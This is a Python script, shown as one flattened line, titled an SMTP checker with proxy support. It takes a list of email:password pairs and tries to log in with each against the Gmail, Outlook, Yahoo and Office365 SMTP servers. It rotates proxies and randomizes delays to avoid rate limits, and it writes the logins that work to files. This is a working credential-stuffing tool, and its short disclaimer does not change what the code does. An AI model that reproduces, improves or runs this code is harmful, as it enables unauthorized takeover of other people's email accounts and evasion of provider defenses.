import os import smtplib import concurrent.futures import sys import time import random from tkinter import Tk from tkinter.filedialog import askopenfilename from colorama import Fore, Style, init import threading from datetime import datetime import logging import socks import socket # Configuring error logging logging.basicConfig(filename='smtp_checker_errors.log', level=logging.ERROR, format='%(asctime)s - %(levelname)s - %(message)s') # Initializing Colorama init(autoreset=True) BANNER = """ ============================ SMTP Checker Tool with Proxy Support ============================ """ SMTP_SERVERS = { "gmail": {"server": "smtp.gmail.com", "port": 587, "delay": 3}, "outlook": {"server": "smtp-mail.outlook.com", "port": 587, "delay": 2}, "yahoo": {"server": "smtp.mail.yahoo.com", "port": 587, "delay": 2}, "office365": {"server": "smtp.office365.com", "port": 587, "delay": 5} } # Global variables VALIDS = 0 INVALIDS = 0 TOTAL_LINES = 0 PROCESSED_LINES = 0 LOCK = threading.Lock() MAX_THREADS = 5 # Reduced for better rate limiting PROXIES = [] CURRENT_PROXY_INDEX = 0 PROXY_LOCK = threading.Lock() def setup_proxy(proxy_string): """Set up a proxy for SMTP connections""" if not proxy_string or proxy_string.lower() == "none": # Reset to direct connection socks.setdefaultproxy() socket.socket = socket._socketobject return None try: proxy_parts = proxy_string.split(':') if len(proxy_parts) >= 2: proxy_type = socks.PROXY_TYPE_SOCKS5 # Default to SOCKS5 # Check if proxy type is specified if proxy_parts[0].lower() == "http": proxy_type = socks.PROXY_TYPE_HTTP host = proxy_parts[1].replace('//', '') port = int(proxy_parts[2]) elif proxy_parts[0].lower() == "socks4": proxy_type = socks.PROXY_TYPE_SOCKS4 host = proxy_parts[1].replace('//', '') port = int(proxy_parts[2]) elif proxy_parts[0].lower() == "socks5": proxy_type = socks.PROXY_TYPE_SOCKS5 host = proxy_parts[1].replace('//', '') port = int(proxy_parts[2]) else: # If no type specified, assume IP:PORT format host = proxy_parts[0] port = int(proxy_parts[1]) # Set up the proxy socks.setdefaultproxy(proxy_type, host, port) socket.socket = socks.socksocket return proxy_string except Exception as e: logging.error(f"Failed to set up proxy {proxy_string}: {str(e)}") # Fall back to direct connection socks.setdefaultproxy() socket.socket = socket._socketobject return None def get_next_proxy(): """Get the next proxy from the list in a thread-safe way""" global CURRENT_PROXY_INDEX if not PROXIES: return None with PROXY_LOCK: proxy = PROXIES[CURRENT_PROXY_INDEX] CURRENT_PROXY_INDEX = (CURRENT_PROXY_INDEX + 1) % len(PROXIES) return proxy def check_smtp_connection(email: str, password: str, smtp_server: str, port: int, delay: int) -> bool: # Get a proxy for this connection proxy = get_next_proxy() proxy_used = setup_proxy(proxy) try: # Apply appropriate delay based on service time.sleep(delay + random.uniform(1, 3)) with smtplib.SMTP(smtp_server, port, timeout=15) as server: server.starttls() server.login(email, password) return True except smtplib.SMTPAuthenticationError: # Specifically for auth failures - normal case for invalid credentials return False except smtplib.SMTPException as e: logging.error(f"SMTP Error for {email} on {smtp_server} with proxy {proxy_used}: {str(e)}") return False except ConnectionRefusedError: logging.error(f"Connection refused for {email} on {smtp_server} with proxy {proxy_used}") return False except TimeoutError: logging.error(f"Connection timeout for {email} on {smtp_server} with proxy {proxy_used}") return False except Exception as e: logging.error(f"Unexpected error checking {email} on {smtp_server} with proxy {proxy_used}: {str(e)}") return False finally: # Reset socket back to default after connection if proxy_used: socks.setdefaultproxy() socket.socket = socket._socketobject def process_email(email_pass: str, folder_path: str): global VALIDS, INVALIDS, PROCESSED_LINES try: # Format validation if email_pass.count(":") != 1: with LOCK: INVALIDS += 1 PROCESSED_LINES += 1 logging.warning(f"Invalid string format: {email_pass}") return email, password = email_pass.strip().split(":") domain = email.split("@")[-1].lower() # Checking only known servers for server_name, server_info in SMTP_SERVERS.items(): if server_name in domain or domain.endswith(server_name + ".com"): if check_smtp_connection(email, password, server_info["server"], server_info["port"], server_info["delay"]): with LOCK: VALIDS += 1 save_valid_account(folder_path, server_name, email, password, server_info["server"], server_info["port"]) print(Fore.GREEN + f"[VALID] {email}:{password} ({server_name})") break else: with LOCK: INVALIDS += 1 print(Fore.RED + f"[INVALID] {email}:{password}") break else: with LOCK: INVALIDS += 1 print(Fore.YELLOW + f"[UNKNOWN] {email} (Unsupported domain)") except Exception as e: logging.error(f"Critical processing error for {email_pass}: {str(e)}") with LOCK: INVALIDS += 1 finally: with LOCK: PROCESSED_LINES += 1 def save_valid_account(folder_path: str, service: str, email: str, password: str, server: str, port: int): try: filename = f"valid_{service}_accounts.txt" with open(os.path.join(folder_path, filename), "a") as f: f.write(f"{email}:{password}|{server}:{port}\n") except Exception as e: logging.error(f"Error saving valid account {email}: {str(e)}") def print_disclaimer(): print(Fore.RED + "=" * 70) print(Fore.RED + "DISCLAIMER: USE THIS TOOL RESPONSIBLY AND ETHICALLY") print(Fore.RED + "This tool should only be used on accounts you own or have explicit") print(Fore.RED + "permission to test. Unauthorized access to accounts is illegal.") print(Fore.RED + "=" * 70) time.sleep(2) # Give time to read def load_proxies(proxy_file_path=None): """Load proxies from a file if provided""" global PROXIES if not proxy_file_path: return try: with open(proxy_file_path, 'r', encoding='utf-8', errors='ignore') as f: PROXIES = [line.strip() for line in f if line.strip()] print(Fore.CYAN + f"Loaded {len(PROXIES)} proxies from {proxy_file_path}") except Exception as e: print(Fore.RED + f"Error loading proxies: {e}") PROXIES = [] def main(): global TOTAL_LINES print(Fore.CYAN + BANNER + Style.RESET_ALL) print_disclaimer() # Selecting a data file Tk().withdraw() file_path = askopenfilename(title="Select the file with email:password", filetypes=[("Text files", "*.txt")]) if not file_path: print(Fore.RED + "No file selected. Exiting." + Style.RESET_ALL) return # Option to select proxy file use_proxies = input(Fore.CYAN + "Do you want to use proxies? (y/n): " + Style.RESET_ALL).lower() == 'y' if use_proxies: proxy_file_path = askopenfilename(title="Select the file with proxies", filetypes=[("Text files", "*.txt")]) if proxy_file_path: load_proxies(proxy_file_path) else: print(Fore.YELLOW + "No proxy file selected. Continuing without proxies." + Style.RESET_ALL) # Reading a file with error handling try: with open(file_path, "r", encoding='utf-8', errors='ignore') as f: email_pass_list = [line.strip() for line in f if line.strip()] TOTAL_LINES = len(email_pass_list) print(Fore.CYAN + f"Loaded {TOTAL_LINES} email:password combinations") except Exception as e: print(Fore.RED + f"File read error: {e}" + Style.RESET_ALL) return # Creating a folder for results timestamp = datetime.now().strftime("%Y%m%d_%H%M") result_folder = f"smtp_results_{timestamp}" os.makedirs(result_folder, exist_ok=True) print(Fore.CYAN + f"Results will be saved to: {result_folder}") # Limited multithreaded processing with better progress tracking print(Fore.CYAN + "Starting verification process...") with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: futures = [executor.submit(process_email, email_pass, result_folder) for email_pass in email_pass_list] # Progress Bar while PROCESSED_LINES < TOTAL_LINES: time.sleep(1.0) progress = (PROCESSED_LINES / TOTAL_LINES) * 100 print(f"\rProcessed: {PROCESSED_LINES}/{TOTAL_LINES} ({progress:.1f}%) - Valid: {VALIDS}, Invalid: {INVALIDS}", end="") print(Fore.CYAN + f"\n\nCompleted! Valid: {VALIDS}, Invalid: {INVALIDS}" + Style.RESET_ALL) print(Fore.YELLOW + f"Valid accounts saved to the {result_folder} folder" + Style.RESET_ALL) print(Fore.YELLOW + f"Check smtp_checker_errors.log for any errors encountered" + Style.RESET_ALL) if __name__ == "__main__": try: main() except KeyboardInterrupt: print(Fore.RED + "\nProcess interrupted by user. Exiting..." + Style.RESET_ALL) except Exception as e: print(Fore.RED + f"\nUnexpected error: {e}" + Style.RESET_ALL) logging.critical(f"Critical error in main: {str(e)}")